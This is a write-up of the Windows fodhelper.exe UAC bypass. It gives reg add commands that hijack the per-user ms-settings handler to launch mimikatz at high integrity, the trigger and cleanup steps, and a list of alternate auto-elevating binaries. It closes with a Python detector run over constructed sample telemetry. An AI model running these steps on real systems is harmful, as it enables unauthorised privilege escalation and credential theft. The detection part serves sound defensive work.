
UAC Bypass

What is UAC?

User Account Control (UAC) limits what applications can do even when the logged-on user is a local administrator: by default an admin's processes run with a filtered medium-integrity token, and privileged actions require an explicit consent prompt. A UAC bypass avoids that prompt and runs code with high-integrity privileges.

Some Windows binaries are marked auto-elevate in their manifest (fodhelper.exe is one), so they start at high integrity without prompting. fodhelper.exe then launches the handler registered for the ms-settings protocol, and because the per-user HKCU\Software\Classes hive is consulted before the machine-wide HKLM\Software\Classes hive, a key that a standard user can write takes precedence: whatever command is stored there runs without a UAC prompt.

Bypass Steps

Step 1: Set Registry Keys

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "C:\Temp\mimikatz.exe" /f
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f

Step 2: Trigger Payload

C:\Windows\System32\fodhelper.exe

Step 3: Clean Up

reg delete "HKCU\Software\Classes\ms-settings" /f

We can verify that the payload is running in the high-integrity context with mimikatz's privilege::debug command, which only succeeds from an elevated process.

Other Auto-Elevated Binaries

Binary                  Notes
fodhelper.exe           Most reliable
sdclt.exe               Windows 10 only
computerdefaults.exe    Alternate option
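As an added defensive example (not code from the original page), the following Python detector flags the two halves of the chain described above in endpoint telemetry: a write to the per-user ms-settings handler key from Step 1, and any of the auto-elevating binaries in the table spawning a process outside C:\Windows. The log lines, their key=value layout, the C:\Windows allow-list and the payload path are constructed assumptions modelled loosely on Sysmon event IDs 13 (registry value set) and 1 (process create).

```python
import re

# Auto-elevating binaries named on this page, and the handler key they resolve.
AUTO_ELEVATE = {"fodhelper.exe", "sdclt.exe", "computerdefaults.exe"}
MS_SETTINGS_CMD = re.compile(r"\\software\\classes\\ms-settings\\shell\\open\\command\\", re.I)

# Constructed sample telemetry in a simplified key=value form modelled on Sysmon
# EventID 13 (registry value set) and EventID 1 (process create). These lines
# are made up for this example; they were not captured from a real host.
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-111-222-333-1001\Software\Classes\ms-settings\shell\open\command\(Default) Details=C:\Temp\payload.exe",
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-111-222-333-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute Details=(Empty)",
    r"EventID=1 Image=C:\Temp\payload.exe ParentImage=C:\Windows\System32\fodhelper.exe IntegrityLevel=High",
    r"EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe IntegrityLevel=Medium",
]

def parse_event(line):
    """Turn one 'key=value key=value' line into a dict (values carry no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def detect(lines):
    """Return (kind, subject, detail) tuples for each suspicious event."""
    alerts = []
    for ev in map(parse_event, lines):
        eid = ev.get("EventID")
        target = ev.get("TargetObject", "")
        if eid == "13" and MS_SETTINGS_CMD.search(target):
            # Any write to the per-user ms-settings handler is suspicious: normal
            # software registers this handler machine-wide, not under HKCU.
            value_name = target.rsplit("\\", 1)[-1]
            alerts.append(("registry_hijack", value_name, ev.get("Details", "")))
        elif eid == "1":
            parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
            image = ev.get("Image", "")
            # An auto-elevating binary spawning something outside C:\Windows is the
            # payload launch; the path allow-list is a simplifying assumption.
            if parent in AUTO_ELEVATE and not image.lower().startswith("c:\\windows\\"):
                alerts.append(("elevated_child", parent, image))
    return alerts

def is_bypass_chain(alerts):
    """True when both the registry hijack and the elevated launch were observed."""
    kinds = {kind for kind, _, _ in alerts}
    return {"registry_hijack", "elevated_child"} <= kinds

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print("UAC bypass chain detected:", is_bypass_chain(found))
```

The registry half alone is worth alerting on in a real deployment, since the key is almost never legitimately created under HKCU; the process half mainly raises confidence and points at the payload.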